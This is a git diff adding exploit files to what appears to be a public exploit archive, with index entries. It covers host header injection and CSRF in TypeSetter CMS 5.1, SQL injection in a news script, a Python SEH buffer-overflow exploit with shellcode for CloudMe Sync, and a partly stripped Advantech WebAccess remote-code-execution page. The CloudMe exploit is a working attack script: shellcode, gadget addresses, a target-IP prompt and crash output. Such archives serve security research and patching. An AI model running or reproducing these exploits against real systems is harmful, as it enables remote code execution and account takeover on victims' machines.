diff --git a/exploits/php/webapps/44028.txt b/exploits/php/webapps/44028.txt new file mode 100644 index 000000000..e40144b04 --- /dev/null +++ b/exploits/php/webapps/44028.txt @@ -0,0 +1,34 @@ +​# Exploit Title: TypeSetter CMS 5.1 Host Header Injection +# Date: 10-02-2018 +# Exploit Author: Navina Asrani +# Contact: https://twitter.com/NavinaSanjay +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://www.typesettercms.com/ +# Version: 5.1 +# CVE : NA +# Category: Webapp CMS + +1. Description + +The application allows illegitimate host header manipulation and leads to aribtary web page re-direction. This can also lead to severe attacks such as password reset or web cache poisoning + + +2. Proof of Concept + +1. Visit the application +2. Tamper the request and change the host to any arbitrary header like google.com +3. The same is added in request and complete page re-direction takes place. +Exploitation Technique: A attacker can perform application modification to perform advanced attacks as as password reset/ cache poisoning etc. +Severity Level: High +Security Risk: +The presence of such a risk can lead to user cache poisoning and user re-direction +Exploit code: + +GET / HTTP/1.1 +Host: google.com + +You can observe the page being re-directed and the Location header changed in response to: http://www.google.com/ + +3. Solution: + +To Mitigate host header injections allows only a white-list of allowed host names. \ No newline at end of file diff --git a/exploits/php/webapps/44029.html b/exploits/php/webapps/44029.html new file mode 100644 index 000000000..f6159f09e --- /dev/null +++ b/exploits/php/webapps/44029.html @@ -0,0 +1,40 @@ +# Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery +# Date: 10-02-2018 +# Exploit Author: Navina Asrani +# Contact: https://twitter.com/NavinaSanjay +# Website: https://securitywarrior9.blogspot.in/ +# Vendor Homepage: https://www.typesettercms.com/ +# Version: 5.1 +# CVE : NA +# Category: Webapp CMS + +1. Description + +The application allows malcious HTTP requests to be directly executed without any hidden security token.This may lead to user account takeover or malious command execution + +2. Proof of Concept + +Exploit code: + + + +
+ + + + + + + + + + +
+ + + + + +3. Solution: + +To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens​ \ No newline at end of file diff --git a/exploits/php/webapps/44030.txt b/exploits/php/webapps/44030.txt new file mode 100644 index 000000000..88f477147 --- /dev/null +++ b/exploits/php/webapps/44030.txt @@ -0,0 +1,23 @@ +################################################################## +# Exploit Title:News Website Script - SQL Injection (Error Based) +# Google Dork: NA +# Date: 12.02.2018 +# Exploit Author: Varun Bagaria +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: *http://under24usd.com/demo/newstoday/index.php +# Version: 2.0.4 +# Tested on: Windows 7 +# Category: Webapps +# CVE : NA +################################################################## + +Proof of Concept +================= + +Attack Parameter : search +Payload : ' + +Reproduction Steps: +------------------------------ +1. Access the script +2. In the search bar insert ' and you will get error based SQL Injection \ No newline at end of file diff --git a/exploits/windows/remote/44027.py b/exploits/windows/remote/44027.py new file mode 100755 index 000000000..db2cd9297 --- /dev/null +++ b/exploits/windows/remote/44027.py @@ -0,0 +1,171 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt +[+] ISR: Apparition Security +[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669 + + +Vendor: +============= +www.cloudme.com + + +Product: +=========== +CloudMe Sync <= v1.10.9 + +(CloudMe_1109.exe) +hash: 0e83351dbf86562a70d1999df7674aa0 + +CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. +It features a blue folder that appears on all devices with the same content, all files are synchronized between devices. + + + +Vulnerability Type: +=================== +Buffer Overflow + + + +CVE Reference: +============== +CVE-2018-6892 + + + +Security Issue: +================ +Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port 8888, can send a malicious payload causing +a Buffer Overflow condition. This will result in an attacker controlling the programs execution flow and allowing arbitrary code execution on the victims PC. + +CloudMe Sync client creates a socket listening on TCP Port 8888 (0x22B8) + +In Qt5Core: + +00564DF1 . C74424 04 B822>MOV DWORD PTR SS:[ESP+4],22B8 +00564DF9 . 890424 MOV DWORD PTR SS:[ESP],EAX +00564DFC . FF15 B8738100 CALL DWORD PTR DS:[<&Qt5Network._ZN10QTc>; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst + + +C:\>netstat -ano | findstr 8888 +TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 15504 +TCP [::]:8888 [::]:0 LISTENING 15504 + + +Buffer Overflow: +================ +EIP register will be overwritten at about 1075 bytes. + +EAX 00000001 +ECX 76F698DA msvcrt.76F698DA +EDX 00350000 +EBX 41414141 +ESP 0028D470 +EBP 41414141 +ESI 41414141 +EDI 41414141 +EIP 41414141 + +Stack Dump: +========== + +(508.524): Access violation - code c0000005 (first/second chance not available) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - +eax=00000000 ebx=00000000 ecx=41414141 edx=778f353d esi=00000000 edi=00000000 +eip=41414141 esp=00091474 ebp=00091494 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +41414141 ?? ??? + +Exploitation is very easy as ASLR SafeSEH are all set to false making the exploit portable and able to work across different operating systems. +We will therefore use Structured Exceptional Handler overwrite for our exploit. + +e.g. + +6FE6909D 0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll) +00476795 0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe) +61E7B7F6 0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll) + + +0day Exploit POC: +============== +import socket,struct + +print 'CloudMe Sync v1.10.9' +print 'Unauthenticated Remote Buffer Overflow 0day' +print 'Discovery/credits: hyp3rlinx' +print 'apparition security\n' + + +#shellcode to pop calc.exe Windows 7 SP1 +sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" +"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" +"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" +"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" +"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" +"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" +"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") + + +ip=raw_input('[+] CloudMe Target IP> ') + +nseh="\xEB\x06"+"\x90"*2 #JMP +seh=struct.pack('Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution + + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 4bc031f83..331a4335b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16013,6 +16013,8 @@ id,file,description,date,author,type,platform,port 44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple, 44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple, 44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux, +44027,exploits/windows/remote/44027.py,"CloudMe Sync < 1.11.0 - Buffer Overflow",2018-02-13,hyp3rlinx,remote,windows, +44031,exploits/windows/remote/44031.html,"Advantech WebAccess 8.3.0 - Remote Code Execution",2018-02-13,"Nassim Asrir",remote,windows, 41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows, 41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows, 41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22 @@ -38032,6 +38034,9 @@ id,file,description,date,author,type,platform,port 44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java, 44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java, 44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java, +44028,exploits/php/webapps/44028.txt,"TypeSetter CMS 5.1 - 'Host' Header Injection",2018-02-13,"Navina Asrani",webapps,php, +44029,exploits/php/webapps/44029.html,"TypeSetter CMS 5.1 - Cross-Site Request Forgery",2018-02-13,"Navina Asrani",webapps,php, +44030,exploits/php/webapps/44030.txt,"News Website Script 2.0.4 - 'search' SQL Injection",2018-02-13,"Varun Bagaria",webapps,php, 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php, 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80